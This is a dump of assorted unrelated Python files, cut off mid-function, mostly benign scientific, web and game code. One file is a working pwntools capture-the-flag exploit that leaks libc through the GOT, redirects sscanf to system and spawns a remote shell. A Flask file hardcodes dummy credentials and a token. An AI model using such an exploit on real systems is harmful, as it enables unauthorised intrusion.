text stringlengths 38 1.54M |
|---|
import math
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
from PIL import Image
# from tf_cnnvis import *
def weight(shape):
return tf.Variable(tf.truncated_normal(shape, stddev=0.1))
def bias(length):
return tf.Variable(tf.constant(0.1, shape=[length]))
def layer(input, num_input_channels, filter_size, num_filters, use_bn=False,
use_relu=True, use_pool=True, use_dropout=True):
shape = [filter_size, filter_size, num_input_channels, num_filters]
weights = weight(shape)
biases = bias(num_filters)
layer = tf.nn.conv2d(input=input, filter=weights, strides=[1, 1, 1, 1],
padding="SAME")
layer += biases
if use_bn:
layer = tf.layers.batch_normalization(layer, training=training)
if use_relu:
layer = tf.nn.relu(layer)
if use_pool:
layer = tf.nn.max_pool(value=layer, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding="SAME")
if use_dropout:
layer = tf.nn.dropout(layer, keep_prob)
return layer
def save_layer(layer, image, image_name, use):
image = image.reshape(img_size_flat)
feed_dict = {x: [image], keep_prob: 0.5}
values = session.run(layer, feed_dict=feed_dict)
num_filters = values.shape[3]
num_grids = int(math.ceil(math.sqrt(num_filters)))
fig, axes = plt.subplots(num_grids, num_grids)
for i, ax in enumerate(axes.flat):
if i < num_filters:
img = values[0, :, :, i]
ax.imshow(img, interpolation='nearest', cmap='binary')
fig.savefig("data/layers/features/" + image_name +
"_" + use + ".png")
keep_prob = tf.placeholder(tf.float32)
filter_size1 = 3
num_filters1 = 32
filter_size2 = 3
num_filters2 = 64
filter_size3 = 3
num_filters3 = 128
filter_size4 = 3
num_filters4 = 256
num_channels = 3
img_size = 128
img_size_flat = img_size * img_size * num_channels
img_shape = (img_size, img_size)
training = True
x = tf.placeholder(tf.float32, shape=[None, img_size_flat], name='x')
x_image = tf.reshape(x, [-1, img_size, img_size, num_channels])
layer1 = layer(input=x_image, num_input_channels=num_channels,
filter_size=filter_size1, num_filters=num_filters1)
session = tf.Session()
session.run(tf.global_variables_initializer())
img0 = Image.open("record/images/not_preprocessed/test/test_34.png")
image0 = np.array(img0)
img1 = Image.open("record/images/not_preprocessed/test/test_31.png")
image1 = np.array(img1)
save_layer(layer=layer1, image=image0, image_name="maze", use="conv")
save_layer(layer=layer1, image=image1, image_name="pig", use="conv")
# image0 = image0.reshape(img_size_flat)
# feed_dict = {x: [image0], keep_prob: 0.5}
# layers = ["r", "p", "c"]
# is_success = deconv_visualization(sess_graph_path=session,
# value_feed_dict=feed_dict,
# input_tensor=x_image, layers=layers,
# path_logdir="record/images/layers/maze/",
# path_outdir="record/images/layers/maze/")
# image1 = image1.reshape(img_size_flat)
# feed_dict = {x: [image1], keep_prob: 0.5}
# layers = ["r", "p", "c"]
# is_success = deconv_visualization(sess_graph_path=session,
# value_feed_dict=feed_dict,
# input_tensor=x_image, layers=layers,
# path_logdir="record/images/layers/pig/",
# path_outdir="record/images/layers/pig/")
session.close()
img0.close()
img1.close()
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
"""misc helper functions
"""
import hashlib
from collections import Counter, OrderedDict
import numpy as np
import torch
def make_weights_for_balanced_classes(dataset):
counts = Counter()
classes = []
for _, y in dataset:
y = int(y)
counts[y] += 1
classes.append(y)
n_classes = len(counts)
weight_per_class = {}
for y in counts:
weight_per_class[y] = 1 / (counts[y] * n_classes)
weights = torch.zeros(len(dataset))
for i, y in enumerate(classes):
weights[i] = weight_per_class[int(y)]
return weights
class _SplitDataset(torch.utils.data.Dataset):
"""Used by split_dataset"""
def __init__(self, underlying_dataset, keys):
super(_SplitDataset, self).__init__()
self.underlying_dataset = underlying_dataset
self.keys = keys
def __getitem__(self, key):
return self.underlying_dataset[self.keys[key]]
def __len__(self):
return len(self.keys)
def split_dataset(dataset, n, seed=0):
"""
Return a pair of datasets corresponding to a random split of the given
dataset, with n datapoints in the first dataset and the rest in the last,
using the given random seed
"""
assert n <= len(dataset)
keys = list(range(len(dataset)))
np.random.RandomState(seed).shuffle(keys)
keys_1 = keys[:n]
keys_2 = keys[n:]
return _SplitDataset(dataset, keys_1), _SplitDataset(dataset, keys_2)
def seed_hash(*args):
"""
Derive an integer hash from all args, for use as a random seed.
"""
args_str = str(args)
return int(hashlib.md5(args_str.encode("utf-8")).hexdigest(), 16) % (2**31)
|
print("welcome to shenzhen!")
print("welcome to shenzhen!")
print("welcome to shenzhen!")
print("welcome to shenzhen!")
print("welcome to shenzhen!")
print("welcome to shenzhen!")
print("welcome to shenzhen!")
print("welcome to shenzhen!")
print("welcome to shenzhen!")
print("welcome to shenzhen!")
print("welcome to shenzhen!")
print("welcome to shenzhen!")
print("welcome to shenzhen!")
print("welcome to shenzhen!")
print("welcome to shenzhen!")
print("welcome to shenzhen!")
print("welcome to shenzhen!")
print("welcome to shenzhen!") |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
exe = context.binary = ELF('sum')
host = args.HOST or '35.207.132.47'
port = int(args.PORT or 22226)
env = {'LD_PRELOAD':'./libc-2.27.so'}
def local(argv=[], *a, **kw):
'''Execute the target binary locally'''
if args.GDB:
return gdb.debug([exe.path] + argv, env = env, gdbscript=gdbscript, *a, **kw)
else:
return process([exe.path] + argv, env = env, *a, **kw)
def remote(argv=[], *a, **kw):
'''Connect to the process on the remote host'''
io = connect(host, port)
if args.GDB:
gdb.attach(io, gdbscript=gdbscript)
return io
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.LOCAL:
return local(argv, *a, **kw)
else:
return remote(argv, *a, **kw)
context.terminal = ['gnome-terminal', '-e']
gdbscript = '''
set environment LD_PRELOAD ./libc-2.27.so
break *0x400B41
continue
'''.format(**locals())
# -- Exploit goes here --
io = start()
io.sendlineafter('>', '-1')
log.info("puts@got: {}".format(hex(exe.got['puts'])))
io.sendlineafter('>', 'get {}'.format(exe.got['puts'] / 8))
io.recvuntil('bye')
io.recvuntil('bye')
io.recvuntil('> ')
libc = ELF(env['LD_PRELOAD'])
addr = int(io.recvline().strip())
libc.address = addr - libc.symbols['puts']
log.success('libc addr: {}'.format(hex(libc.address)))
io.sendlineafter('>', 'set {} {}'.format(exe.got['__isoc99_sscanf'] / 8, libc.symbols['system']))
io.sendlineafter('>', 'bye || /bin/sh')
io.interactive()
|
# !usr/bin/env python
# -*- coding: utf-8 -*-
import pandas as pd
from datetime import datetime
import os
def old2new(df):
df[1] = df[1].apply(num2date)
df = df.sort_values([1, 0])
df.columns = ['place', 'date', 'people']
return df
def num2date(num, year='2017'):
num = str(num)
out = str(year) + '-' + num[:2] + '-' + num[2: 4] + ':' + num[4:]
return out
def csv2json(file, year=2017, save_path='data/trains.json'):
df = pd.read_csv(file, sep=',', header=None)
df[1] = df[1].apply(num2date)
df = df.sort_values([1, 0])
df.columns = ['place', 'date', 'people']
df_res = df.reindex(columns=['date', 'place', 'people', 'week', 'holiday'])
df_res['week'] = df_res['date'].apply(lambda x: datetime.strptime(x, '%Y-%m-%d:%H').weekday()+1)
df_res['holiday'] = df_res['week'].apply(lambda x: 1 if x in [6, 7] else 0)
res = df_res.to_json(orient='records')
if os.path.exists(save_path):
raise OSError('文件已存在,无法保存!')
with open(save_path, mode='w+', encoding='utf-8') as f:
f.write(res)
f.close()
if __name__ == '__main__':
file = 'data/train3.csv'
csv2json(file)
|
import gdsfactory as gf
def test_transition_ports() -> None:
width1 = 0.5
width2 = 1.0
x1 = gf.cross_section.strip(width=width1)
x2 = gf.cross_section.strip(width=width2)
xt = gf.path.transition(cross_section1=x1, cross_section2=x2, width_type="linear")
path = gf.path.straight(length=5)
c = gf.path.extrude(path, xt)
assert c.ports["o1"].cross_section.cross_section1.width == width1
assert c.ports["o2"].cross_section.cross_section2.width == width2
if __name__ == "__main__":
# test_transition_ports()
width1 = 0.5
width2 = 1.0
x1 = gf.cross_section.strip(width=0.5)
x2 = gf.cross_section.strip(width=1.0)
xt = gf.path.transition(cross_section1=x1, cross_section2=x2, width_type="linear")
path = gf.path.straight(length=5)
c = gf.path.extrude(path, xt)
assert c.ports["o1"].cross_section.cross_section1.width == width1
assert c.ports["o2"].cross_section.cross_section2.width == width2
c.show(show_ports=True)
|
from math import sin, cos, tan, radians
angi = int(input('Informe o ângulo: '))
ang = radians(angi)
s = sin(ang)
c = cos(ang)
t = tan(ang)
print(t)
|
'''
Copyright (C) 2018-2023 Bryant Moscon - bmoscon@gmail.com
Please see the LICENSE file for the terms and conditions
associated with this software.
'''
from cryptofeed import FeedHandler
from cryptofeed.backends.influxdb import BookInflux, CandlesInflux, FundingInflux, TickerInflux, TradeInflux
from cryptofeed.defines import CANDLES, FUNDING, L2_BOOK, TICKER, TRADES
from cryptofeed.exchanges import Bitmex, Coinbase
from cryptofeed.exchanges.binance import Binance
INFLUX_ADDR = 'http://localhost:8086'
ORG = 'cryptofeed'
BUCKET = 'cryptofeed'
TOKEN = 'XXXXXXXXXX'
def main():
f = FeedHandler()
f.add_feed(Bitmex(channels=[FUNDING, L2_BOOK], symbols=['BTC-USD-PERP'], callbacks={FUNDING: FundingInflux(INFLUX_ADDR, ORG, BUCKET, TOKEN), L2_BOOK: BookInflux(INFLUX_ADDR, ORG, BUCKET, TOKEN)}))
f.add_feed(Coinbase(channels=[TRADES], symbols=['BTC-USD'], callbacks={TRADES: TradeInflux(INFLUX_ADDR, ORG, BUCKET, TOKEN)}))
f.add_feed(Coinbase(channels=[L2_BOOK], symbols=['BTC-USD'], callbacks={L2_BOOK: BookInflux(INFLUX_ADDR, ORG, BUCKET, TOKEN)}))
f.add_feed(Coinbase(channels=[TICKER], symbols=['BTC-USD'], callbacks={TICKER: TickerInflux(INFLUX_ADDR, ORG, BUCKET, TOKEN)}))
f.add_feed(Binance(candle_closed_only=False, channels=[CANDLES], symbols=['BTC-USDT'], callbacks={CANDLES: CandlesInflux(INFLUX_ADDR, ORG, BUCKET, TOKEN)}))
f.run()
if __name__ == '__main__':
main()
|
from pydub import AudioSegment
import random
origAudio = AudioSegment.from_wav("Full2.wav")
for i in range(180):
t1 = i * 1000 #Works in milliseconds
t2 = (i+1+random.random()) * 1000
newAudio = origAudio[t1:t2]
newAudio.export('gen_samples/'+str(i)+'.wav', format="wav") |
# ---LICENSE-BEGIN - DO NOT CHANGE OR MOVE THIS HEADER
# This file is part of the Neurorobotics Platform software
# Copyright (C) 2014,2015,2016,2017 Human Brain Project
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# ---LICENSE-END
import argparse as ap
import cv2
import numpy as np
import pickle
import time
from typing import Dict
def parse_args():
"""
Defines the valid commandline options and the variables they are linked to.
Returns:
An object which contains the variables which correspond to the
commandline options.
"""
dflt_move=4
parser = ap.ArgumentParser(description='SNN feature detector')
parser.add_argument('--c1-output', type=str, default='C1_reconstructions/',
help='The toplevel output directory for C1\
reconstructions')
parser.add_argument('--delta', metavar='vert', default=dflt_move, type=int,
help='The horizontal and vertical distance between the\
basic recognizers')
parser.add_argument('--feature-dir', type=str,
help='A directory where the features are stored as images')
parser.add_argument('--filter', choices=['canny', 'sobel', 'none'],
default='none', help='Sets the edge filter to be used.\
Defaults to \'none\'')
parser.add_argument('--frames', default=10, type=int,
help='The number of video frames to be processed')
parser.add_argument('--no-c1', action='store_true',
help='Disables the creation of C1 layers')
parser.add_argument('--plot-spikes', action='store_true',
help='Plot the spike trains of all layers')
parser.add_argument('--plot-weights', action='store_true',
help='Plots the learned feature weights and exits')
parser.add_argument('--refrac-s1', type=float, default=.1, metavar='MS',
help='The refractory period of neurons in the S1 layer in ms')
parser.add_argument('--refrac-s2', type=float, default=.1, metavar='MS',
help='The refractory period of neurons in the S2 layer in ms')
parser.add_argument('--refrac-c1', type=float, default=.1, metavar='MS',
help='The refractory period of neurons in the C1 layer in ms')
parser.add_argument('--reconstruct-s1-img', action='store_true',
help='If set, draws a reconstruction of the recognized\
features from S1')
parser.add_argument('--reconstruct-c1-img', action='store_true',
help='If set, draws a reconstruction of the recognized\
features from C1')
parser.add_argument('--scales', default=[1.0, 0.71, 0.5, 0.35, 0.25],
nargs='+', type=float,
help='A list of image scales for which to create\
layers. Defaults to [1, 0.71, 0.5, 0.35, 0.25]')
parser.add_argument('--sim-time', default=100, type=float, help='Simulation time')
parser.add_argument('--target-name', type=str,
help='The name of the already edge-filtered image to\
be recognized')
args = parser.parse_args()
print(args)
return args
def filter_img(target_img, filter_type):
"""
Performs the given edge detector on the given image
Arguments:
`target_img`: The image to detect edges from
`filter_type`: The filter to be applied to the target image. Can be one
of 'canny', 'sobel' or 'none', if the image is to be
used as-is.
Returns:
An image containing the edges of the target image
"""
blurred_img = cv2.GaussianBlur(target_img, (5, 5), 1.4)
filtered_img = None
if filter_type == 'none':
return target_img
if filter_type == 'canny':
filtered_img = cv2.Canny(blurred_img, 70, 210)
else:
dx = cv2.Sobel(blurred_img, cv2.CV_64F, 1, 0)
dy = cv2.Sobel(blurred_img, cv2.CV_64F, 0, 1)
edge_detected = cv2.sqrt(dx * dx + dy * dy)
filtered_img = cv2.convertScaleAbs(edge_detected)
return filtered_img
def get_gabor_feature_names():
"""
Returns the feature names of the gabor filtered images
"""
return ['slash', 'horiz_slash', 'horiz_backslash', 'backslash']
def get_gabor_edges(target_img) -> Dict[str, np.array]:
"""
Computes the gabor filtered images for four orientations for the given
unfiltered image
Parameters:
`target_img`: The original target image
Returns:
A dictionary which contains for each name the corresponding filtered
image
"""
angles = [np.pi / 8, np.pi / 4 + np.pi / 8, np.pi / 2 + np.pi / 8,
3 * np.pi / 4 + np.pi / 8]
feature_names = get_gabor_feature_names()
blurred_img = cv2.GaussianBlur(target_img, (5, 5), 5)#gao si filter pinghua
return dict([(name,
cv2.convertScaleAbs(\
cv2.filter2D(blurred_img, cv2.CV_64F,
cv2.getGaborKernel((5, 5), 1.4, angle, 5, 1))))\
for name, angle in zip(feature_names, angles)])#2dfilter 64 double
def read_and_prepare_img(target_name, filter_type):
"""
Reads the input image and performs the edge detector of the passed
commandline arguments on it
Arguments:
`target_name`: The name of the image to be read
`filter_type`: The filter to be applied to the target image. Can be one
of 'canny', 'sobel' or 'none', if the image is to be
used as-is.
Returns:
An image containing the edges of the target image
"""
target_img = cv2.imread(target_name, cv2.CV_8U)
# Optionally resize the image to 300 pixels (or less) in height
return filter_img(target_img, filter_type)
def float_to_fourcc_string(x):
"""
Converns a float to its fourcc number as a string.
Parameters:
`x`: The float as returned by cv2.VideoCapture.get(cv2.CAP_PROP_FOURCC)
Returns:
The used encoder extension as a string
"""
x = int(x)
c1 = chr(x & 0xFF)
c2 = chr((x & 0xFF00) >> 8)
c3 = chr((x & 0xFF0000) >> 16)
c4 = chr((x & 0xFF000000) >> 24)
return c1 + c2 + c3 + c4
def fourcc_string_to_int(s):
"""
Converns a fourcc string to a float
Parameters:
`s`: The fourcc string to be converted
Returns:
A float representing the code for the given codec string
"""
n1 = ord(s[0])
n2 = ord(s[1])
n3 = ord(s[2])
n4 = ord(s[3])
return (n4 << 24) + (n3 << 16) + (n2 << 8) + n1
|
from jinja2 import Environment, FileSystemLoader
# from weasyprint import HTML
# import pdfkit
table_placeholder = """<div class="row" >
<table class="u-full-width">
<thead class="fqred">
<tr>
<th>Name</th>
<th>Age</th>
<th>Sex</th>
<th>Location</th>
</tr>
</thead>
<tbody>
<tr>
<td>Dave Gamache</td>
<td>26</td>
<td>Male</td>
<td>San Francisco</td>
</tr>
<tr>
<td>Dwayne Johnson</td>
<td>42</td>
<td>Male</td>
<td>Hayward</td>
</tr>
</tbody>
</table>
</div>
"""
temp_vars = {
'client':'Example Client',
'totalTraffic': 123000000,
'percentages': {
'total': 25.25,
'true': 9.13,
'view': 54.65
},
'source': {'bottom': 0.00,
'bottomRange': 'Premium',
'top': 99.98,
'topRange': 'Critical'
},
'trafficType': 'Impressions',
'implementationTech': 'JS Tag',
'table_placeHolder': table_placeholder,
'input' : {
'source': 'Network',
'subsource': 'Publisher',
'campaign' : 'Campaign ID',
'domain': 'Page URL'
},
'startDate': '1/24/2017',
'endDate': '3/24/2017',
'diveInput': 'Sub Source',
'diveFocus': 'Example Publisher',
}
# temp_vars =
env = Environment(loader=FileSystemLoader('.'))
template = env.get_template("template.html")
html_out = template.render(temp_vars)
# pdf = HTML(html_out).write_pdf()
# with open('report.pdf', 'w') as f:
# f.write(pdf)
with open('index.html', 'w') as f:
f.write(html_out)
# pdfkit.from_file('index.html', 'out.pdf')
|
from __future__ import absolute_import
from django.db import models
from .utils import ugettext_lazy_compact as _
# from localflavor.in_ import models as india_models
class ClientIndustry(models.Model):
name =models.CharField(
max_length=50,
blank=False,
unique=True,
null=False)
slug= models.SlugField(
max_length=50,
blank=False,
null=False,
unique=True,
db_index=True)
def __unicode__(self):
return self.name
class Client(models.Model):
name =models.CharField(
verbose_name='Client name',
max_length=200,
blank=False,
unique=True,
null=False
)
industry = models.ForeignKey(
'ClientIndustry',
blank=True,
null=True,
on_delete=models.SET_NULL,)
mailing_street = models.CharField(
max_length=100,
blank=True,
null=True,
verbose_name=_('Mailing Street'))
mailing_street2 = models.CharField(
max_length=100,
blank=True,
null=True,
verbose_name=_('Mailing Street 2'))
mailing_city = models.CharField(
max_length=100,
blank=True,
null=True,
verbose_name=_('Mailing City'))
# mailing_state = india_models.INStateField(
# blank=True,
# null=True,
# verbose_name=_('Mailing State'))
mailing_zip = models.CharField(
max_length=10,
blank=True,
null=True,)
website = models.URLField(
max_length=200,
blank=True,
null=True,)
class Meta:
verbose_name = _('client')
verbose_name_plural = _('clients')
def __unicode__(self):
return self.name
|
#coding=utf-8
'''
FileName :decomPCA.py
Author :@zch0423
Date :Jun 11, 2021
Description :
PCA 查看bert embedding主成分
'''
#%%
import numpy as np
from sklearn.decomposition import PCA
import matplotlib.pyplot as plt
#%%
def loadData(data_type="trn", w2v_type="avg"):
'''
@Description
载入数据并返回
------------
@Params
data_type, str, in ["trn", "dev", "tst"]
w2v_type, str, in ["avg", "CLS"]
------------
@Returns
X, y
'''
if data_type not in ["trn", "dev", "tst"]:
raise ValueError("check data_type!")
if w2v_type not in ["avg", "CLS"]:
raise ValueError("check w2v_type")
base = "/Users/zch/Desktop/IM319_NLP.nosync/project/data"
X_path = f"{base}/w2v/{w2v_type}_{data_type}_last.npy"
y_path = f"{base}/labels/{data_type}.npy"
X = np.load(X_path)
X = X.reshape(X.shape[0], X.shape[-1])
y = np.load(y_path)
return X, y
#%%
w2v_type="avg"
# trn_X, trn_y = loadData("trn", w2v_type)
dev_X, dev_y = loadData("dev", w2v_type)
# tst_X, tst_y = loadData("tst", w2v_type)
x = np.arange(1, 400, 20)
y = []
for i in x:
pca = PCA(n_components=i)
pca.fit(dev_X)
y.append(sum(pca.explained_variance_ratio_))
plt.plot(x, y)
plt.scatter(x,y)
for i,j in list(zip(x, y))[::4]:
plt.text(i, j-0.05, "(%d,%.2f)" % (i,j))
plt.title("PCA For BERT Embedding")
plt.ylabel("Explained Ratio")
plt.xlabel("Components")
plt.show()
|
# Header
magic = "P3"
author = "# Created by Shawn Wilkinson"
size_x, size_y = (320, 240)
inten = 255
# Open/Create File and Add Header
f = open('1.4pe1.ppm', 'w+')
f.write(magic + "\n")
f.write(author + "\n")
f.write(str(size_x) + " " + str(size_y) + "\n")
f.write(str(inten) + "\n")
# Write Image
color = (127, 127, 127)
for y in range(size_y):
for x in range(size_x):
f.write( str(color[0]) + " " + str(color[1]) + " " + str(color[2]) + " ")
f.write("\n") |
#!/usr/bin/env python3
import riotgear.cli
import riotgear.plugin
if __name__ == "__main__":
parser = riotgear.cli.clidriver()
reg = riotgear.plugin.Registry(default_dirs=['plugins'])
reg.load_all()
args = parser.parse_partial()
extra = parser.parse()
print(extra)
parser.launch()
|
# Flask Framework
from flask import Flask, jsonify, request, make_response, Response
# Routes
from src.routes.api import api
# Authentication
from src.models.auth import Auth
# Dummy Credentials
users = {
'email': 'ruel@mindo.com',
'auth': {
'key': 'secretkey',
'password': 'test',
'token': 'F6Xik2zCXdAEBdIKkOmeZuR6BasPQ4QeuxTZEo5kn44wjT9wVl3YZU6uHhMwGW276GfMEt38AQlRxxEAwSkuD8eydleHAnOiAxNTYxNjI2MjM2LjAsICdpZCc6IDF9YTBjZmM2OWFmZDk2NWMyYzNmNDg3ZTk5OGUyOTFiMzc5MWI3Yzk5YzFkMTE0MzRmNjg3MDk1NjU3NWI3MmM3Ng'
}
}
# HTTP
class HTTP:
status = {
'200': 'Ok',
'201': 'Created',
'400': 'Bad Request',
'401': 'Unauthorized',
'403': 'Forbidden',
'404': 'Not Found',
'405': 'Method Not Allowed',
'406': 'Not Acceptable',
'409': 'Conflict',
}
# Request
request = request
def __init__(self):
# Authentication
self.auth = Auth()
# Flask Framework
self.flask = Flask(__name__)
# API Services
def api(self, service):
api(self, service)
# Response
def response(self, data = [], code = 401):
para = {
'status': code,
'message': self.status[str(code)],
}
if 'error' in data:
para['status'] = data['code']
para['result'] = {'error': data['error']}
response = make_response(jsonify(para), data['code'])
if 'headers' in data:
for i,v in data['headers'].items():
response.headers.set(i,v)
return response
else:
if len(data) > 0:
para['result'] = data
return make_response(jsonify(para), code)
# Authenticate
def authenticate(self):
auth = request.headers.get('authorization')
if auth.find('Basic') >= 0:
basic = self.auth.decode(auth.replace('Basic ', '')).split(':')
if basic[0] == users['email'] and basic[1] == users['auth']['password']:
return True
else:
r = {
'code': 401,
'error': 'Username/Password is Required',
'headers': {
'WWW-Authenticate': 'Basic realm="Required"'
}
}
return r
else:
if auth.find('Bearer') >= 0:
parse = self.auth.parse(auth.replace('Bearer ', ''))
if parse and 'payload' in parse:
# Payload
payload = parse['payload']
if 'token' in parse:
if users['auth']['token'] == parse['token']:
# Verify token
return self.auth.verify(users['auth']['key'], payload, parse['signature'])
return {'code': 401, 'error': 'Invalid Token'} |
#!/usr/bin/env python
""" http://wiki.dominionstrategy.com/index.php/Hill_Fort"""
import unittest
from dominion import Game, Card, Piles
###############################################################################
class Card_Hill_Fort(Card.Card):
def __init__(self):
Card.Card.__init__(self)
self.cardtype = [
Card.CardType.ACTION,
Card.CardType.FORT,
] # pylint: disable=no-member
self.base = Card.CardExpansion.ALLIES
self.cost = 5
self.name = "Hill Fort"
self.desc = """Gain a card costing up to $4.
Choose one: Put it into your hand; or +1 Card and +1 Action."""
def special(self, game, player):
chc = player.plr_choose_options(
"Choose One - gain a card costing up to $4 and ...",
("put it into your hand", Piles.HAND),
("+1 Card and +1 Action", "disc"),
)
if chc == Piles.HAND:
player.plr_gain_card(cost=4, destination=Piles.HAND)
elif chc == "disc":
player.plr_gain_card(cost=4)
player.pickup_card()
player.add_actions(1)
###############################################################################
class Test_Hill_Fort(unittest.TestCase):
def setUp(self):
self.g = Game.TestGame(numplayers=1, initcards=["Forts"])
self.g.start_game()
self.plr = self.g.player_list()[0]
while True:
self.card = self.g["Forts"].remove()
if self.card.name == "Hill Fort":
break
self.plr.add_card(self.card, Piles.HAND)
def test_play_hand(self):
self.plr.test_input = ["put it", "Get Silver"]
hndsz = self.plr.piles[Piles.HAND].size()
acts = self.plr.actions.get()
self.plr.play_card(self.card)
self.assertIn("Silver", self.plr.piles[Piles.HAND])
self.assertEqual(self.plr.piles[Piles.HAND].size(), hndsz)
self.assertEqual(self.plr.actions.get(), acts - 1)
def test_play_disc(self):
self.plr.test_input = ["card", "Get Silver"]
hndsz = self.plr.piles[Piles.HAND].size()
acts = self.plr.actions.get()
self.plr.play_card(self.card)
self.assertNotIn("Silver", self.plr.piles[Piles.HAND])
self.assertEqual(self.plr.piles[Piles.HAND].size(), hndsz + 1 - 1)
self.assertEqual(self.plr.actions.get(), acts - 1 + 1)
###############################################################################
if __name__ == "__main__": # pragma: no cover
unittest.main()
# EOF
|
from AlgoExpert import allkindsofnodedepths as program
import unittest
class TestProgram(unittest.TestCase):
def test_case_1(self):
root = program.BinaryTree(1)
root.left = program.BinaryTree(2)
root.left.left = program.BinaryTree(4)
root.left.left.left = program.BinaryTree(8)
root.left.left.right = program.BinaryTree(9)
root.left.right = program.BinaryTree(5)
root.right = program.BinaryTree(3)
root.right.left = program.BinaryTree(6)
root.right.right = program.BinaryTree(7)
actual = program.allKindsOfNodeDepths(root)
self.assertEqual(actual, 26)
|
# Generated by Django 3.0.5 on 2020-04-16 09:04
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('stores', '0012_auto_20200416_1414'),
]
operations = [
migrations.AddField(
model_name='product',
name='quantity',
field=models.IntegerField(default=1),
),
]
|
import numpy as np
from scipy.integrate import ode
import matplotlib.pyplot as plt
def f(t, p, m):
return [
p[6],
p[7],
p[8],
p[9],
p[10],
p[11],
-fac3(p[0], p[1], p[2], p[3], p[4], p[5], m[1], m[2]),
-fac3(p[1], p[0], p[3], p[2], p[5], p[4], m[1], m[2]),
-fac3(p[2], p[3], p[4], p[5], p[0], p[1], m[2], m[0]),
-fac3(p[3], p[2], p[5], p[4], p[1], p[0], m[2], m[0]),
-fac3(p[4], p[5], p[0], p[1], p[2], p[3], m[0], m[1]),
-fac3(p[5], p[4], p[1], p[0], p[3], p[2], m[0], m[1])
]
def fac3(p00, p01, p10, p11, p20, p21, m1, m2):
return m1 * fac2(p00, p01, p10, p11) + m2 * fac2(p00, p01, p20, p21)
def fac2(p00, p01, p10, p11):
r0 = p00 - p10
r1 = p01 - p11
return r0 / np.power(r0 ** 2.0 + r1 ** 2.0, 1.5)
def main():
p0 = [
3.0, 4.0,
0.0, 0.0,
3.0, 0.0,
0.0, 0.0,
0.0, 0.0,
0.0, 0.0
]
t0 = 0.0
t1 = 70.0
dt = 0.0001
m = [
3.0,
4.0,
5.0
]
p = integrate(f, p0, t0, t1, dt, m)
plot_p(p, 'figure.png')
def integrate(f, p0, t0, t1, dt, m):
r = ode(f)
r.set_integrator('dopri5')
r.set_initial_value(p0, t0)
r.set_f_params(m)
arr = []
while r.successful() and r.t < t1:
arr.append(r.integrate(r.t + dt))
return np.array(arr)
def plot_p(p, filename):
plt.style.use('seaborn')
fig, ax = plt.subplots()
ax.set_title('Three-Body Problem')
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.axis('equal')
ax.grid(True)
ax.axhline(0.0, color='gray')
ax.axvline(0.0, color='gray')
ax.set_xlim(-4.0, 8.0)
ax.set_ylim(-6.0, 6.0)
view = np.reshape(p, (p.shape[0], 2, 3, 2))
ax.plot(view[:, 0, 0, 0], view[:, 0, 0, 1])
ax.plot(view[:, 0, 1, 0], view[:, 0, 1, 1])
ax.plot(view[:, 0, 2, 0], view[:, 0, 2, 1])
plt.savefig(filename)
if __name__ == '__main__':
main()
|
from .. import yshoog
from datetime import datetime
from flask import render_template, session, redirect, url_for,request, jsonify
from ....models import ToolCategory,Tool
from ....utils import utils
from app import db
# 查询所有工具分类
@yshoog.route('/toolcategory/all',methods = ['GET','POST'])
def getAll():
try:
categorys = ToolCategory.query.all()
except:
return utils.network.Network.responseCode(utils.network.HttpVailateError, None, '服务端出现异常')
else:
categorylist = []
for category in categorys:
categorylist.append(category.as_dict())
return utils.network.Network.responseCode(utils.network.HttpSuccess,{'list':categorylist},'查询成功')
# 添加工具分类
@yshoog.route('/toolcategory/add',methods = ['POST'])
def addCategory():
print(request.json)
if 'categoryname' not in request.json :
return utils.network.Network.responseCode(utils.network.HttpParamsError, None, '参数错误')
if request.json['categoryname'] is None:
return utils.network.Network.responseCode(utils.network.HttpParamsError, None, '名称不能为空')
oldcategory = ToolCategory.query.filter_by(categoryname=request.json['categoryname']).first()
if oldcategory is not None:
return utils.network.Network.responseCode(utils.network.HttpVailateError, None, '该分类已存在,请更换名称!')
category = ToolCategory(categoryname=request.json['categoryname'],color=request.json['color'])
db.session.add(category)
db.session.commit()
return utils.network.Network.responseCode(utils.network.HttpSuccess, {'category':category.as_dict()}, '添加成功')
# 修改工具分类
@yshoog.route('/toolcategory/update', methods=['POST'])
def updateCategory():
if 'id' not in request.json :
return utils.network.Network.responseCode(utils.network.HttpParamsError, None, '参数错误')
if request.json['categoryname'] is None:
return utils.network.Network.responseCode(utils.network.HttpParamsError, None, '名称不能为空')
oldcategory = ToolCategory.query.filter_by(categoryname=request.json['id']).first()
if oldcategory is None:
return utils.network.Network.responseCode(utils.network.HttpVailateError,None,'该分类不存在,请检查数据正确性!')
oldcategory.categoryname = request.json['categoryname']
oldcategory.color = request.json['color']
db.session.commit()
return ''
# 刪除工具分类
@yshoog.route('/toolcategory/del',methods = ['POST'])
def delCategory():
if 'id' not in request.json :
return utils.network.Network.responseCode(utils.network.HttpParamsError, None, '参数错误')
oldcategory = ToolCategory.query.filter_by(id=request.json['id']).first()
if oldcategory is None:
return utils.network.Network.responseCode(utils.network.HttpVailateError,None,'该分类不存在,请检查数据正确性!')
db.session.delete(oldcategory)
db.session.commit()
return utils.network.Network.responseCode(utils.network.HttpSuccess, None, '删除成功')
# 添加工具
@yshoog.route('/tools/add',methods = ['POST'])
def addTool():
if 'name' not in request.json :
return utils.network.Network.responseCode(utils.network.HttpParamsError, None, '参数错误')
if request.json['name'] is None:
return utils.network.Network.responseCode(utils.network.HttpParamsError, None, '名称不能为空')
oldTool = Tool.query.filter_by(name=request.json['name']).first()
if oldTool is not None:
return utils.network.Network.responseCode(utils.network.HttpVailateError, None, '该工具已存在,请重新添加')
